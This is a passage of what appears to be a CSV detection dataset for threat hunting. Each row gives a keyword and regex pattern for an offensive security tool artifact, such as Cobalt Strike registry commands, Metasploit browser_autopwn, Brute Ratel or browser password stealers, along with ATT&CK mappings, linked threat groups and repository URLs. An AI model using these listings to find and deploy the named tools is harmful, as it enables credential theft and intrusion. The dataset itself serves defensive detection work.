T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","36214" "*brain.support@cyberfear.com*",".{0,1000}brain\.support\@cyberfear\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns 
retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","36215" "*brc4_ldap_sentinel.py*",".{0,1000}brc4_ldap_sentinel\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","36218" "*Brc4ConfigExtractor.exe*",".{0,1000}Brc4ConfigExtractor\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36219" "*Brc4DecodeString*",".{0,1000}Brc4DecodeString.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36220" 
"*breenmachine/RottenPotatoNG*",".{0,1000}breenmachine\/RottenPotatoNG.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","1","N/A","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","36222" "*breg add *HK*",".{0,1000}breg\sadd\s.{0,1000}HK.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT 
- COZY BEAR - Sandworm","C2","https://github.com/ausecwa/bof-registry","1","0","N/A","N/A","10","10","27","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z","36223" "*breg delete *HK*",".{0,1000}breg\sdelete\s.{0,1000}HK.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ausecwa/bof-registry","1","0","N/A","N/A","10","10","27","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z","36224" "*breg query 
*HK*",".{0,1000}breg\squery\s.{0,1000}HK.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ausecwa/bof-registry","1","0","N/A","N/A","10","10","27","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z","36225" "*breg_add_string_value*",".{0,1000}breg_add_string_value.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","N/A","10","10","27","8","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z","36226" "*bremote_exec*",".{0,1000}bremote_exec.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 
- T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","36227" "*breviaries -Properties DnsHostName*ms-Mcs-AdmPwd*",".{0,1000}breviaries\s\-Properties\sDnsHostName.{0,1000}ms\-Mcs\-AdmPwd.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","36228" "*brew install sniffer*",".{0,1000}brew\sinstall\ssniffer.{0,1000}","offensive_tool_keyword","sniffer","A modern alternative network traffic sniffer.","T1040 - T1052.001 - T1046 - T1552.002","TA0011 - TA0007 - TA0005","N/A","N/A","Sniffing & 
Spoofing","https://github.com/chenjiandongx/sniffer","1","0","N/A","N/A","N/A","8","769","67","2024-03-02T07:48:19Z","2021-11-08T15:36:03Z","36231" "*Brex765ave-Broedx765wser\\Usedx765er Data*",".{0,1000}Brex765ave\-Broedx765wser\\\\Usedx765er\sData.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","36232" "*BronzeTicket/SharpNBTScan*",".{0,1000}BronzeTicket\/SharpNBTScan.{0,1000}","offensive_tool_keyword","SharpNBTScan","a NetBIOS scanner. Ghost actors use this tool for hostname and IP address enumeration","T1018 - T1046","TA0007","Ghost Ransomware","N/A","Discovery","https://github.com/BronzeTicket/SharpNBTScan","1","1","N/A","N/A","7","1","71","4","2021-08-06T05:36:55Z","2021-07-12T08:57:39Z","36234" "*bropper.py *",".{0,1000}bropper\.py\s.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Hakumarachi/Bropper","1","0","N/A","N/A","7","3","201","19","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z","36235" "*Bropper-main.zip*",".{0,1000}Bropper\-main\.zip.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Hakumarachi/Bropper","1","1","N/A","N/A","7","3","201","19","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z","36236" "*browser.keylog_file.write*",".{0,1000}browser\.keylog_file\.write.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized 
Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","N/A","10","5","487","51","2024-11-21T17:36:55Z","2023-08-02T14:30:41Z","36237" "*browser_##*",".{0,1000}browser_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","36239" "*browser_autopwn*",".{0,1000}browser_autopwn.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","36240" "*browser_autopwn*",".{0,1000}browser_autopwn.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36241" "*browser_autopwn2_spec.rb*",".{0,1000}browser_autopwn2_spec\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36242" "*browser_exploit.rb*",".{0,1000}browser_exploit\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36243" "*browser_exploit_server_spec.rb*",".{0,1000}browser_exploit_server_spec\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36244" "*BrowserBookmarkDiscovery_BrowserHistory.py*",".{0,1000}BrowserBookmarkDiscovery_BrowserHistory\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","36245" "*Browser-C2.git*",".{0,1000}Browser\-C2\.git.{0,1000}","offensive_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105 - T1102","TA0003 - TA0005 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","N/A","10","10","102","28","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z","36246" "*Browser-C2-master.zip*",".{0,1000}Browser\-C2\-master\.zip.{0,1000}","offensive_tool_keyword","Browser-C2","Post Exploitation agent which uses a browser to do C2 operations.","T1105 - T1102","TA0003 - TA0005 - 
TA0008","N/A","N/A","C2","https://github.com/0x09AL/Browser-C2","1","1","N/A","N/A","10","10","102","28","2018-05-25T15:12:21Z","2018-05-22T14:33:24Z","36247" "*BrowserDataGrabber.exe*",".{0,1000}BrowserDataGrabber\.exe.{0,1000}","offensive_tool_keyword","Browser Data Grabber","credential access tool used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://github.com/n37sn4k3/BrowserDataGrabber","1","1","N/A","N/A","10","1","7","4","2018-05-28T15:49:03Z","2018-05-04T12:33:32Z","36248" "*BrowserDataGrabber-master.zip*",".{0,1000}BrowserDataGrabber\-master\.zip.{0,1000}","offensive_tool_keyword","Browser Data Grabber","credential access tool used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://github.com/n37sn4k3/BrowserDataGrabber","1","1","N/A","N/A","10","1","7","4","2018-05-28T15:49:03Z","2018-05-04T12:33:32Z","36249" "*browserexploitserver.rb*",".{0,1000}browserexploitserver\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36250" "*BrowserGhost.exe*",".{0,1000}BrowserGhost\.exe.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","1","N/A","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","36251" "*BrowserGhost-N*.exe*",".{0,1000}BrowserGhost\-N.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","36252" "*BrowserListener.py*",".{0,1000}BrowserListener\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","36253" "*Browser-password-stealer.git*",".{0,1000}Browser\-password\-stealer\.git.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","36254" "*Browser-password-stealer-master*",".{0,1000}Browser\-password\-stealer\-master.{0,1000}","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","1","N/A","N/A","10","5","423","62","2024-07-12T10:30:42Z","2020-09-15T09:23:56Z","36255" "*browserpivot *",".{0,1000}browserpivot\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
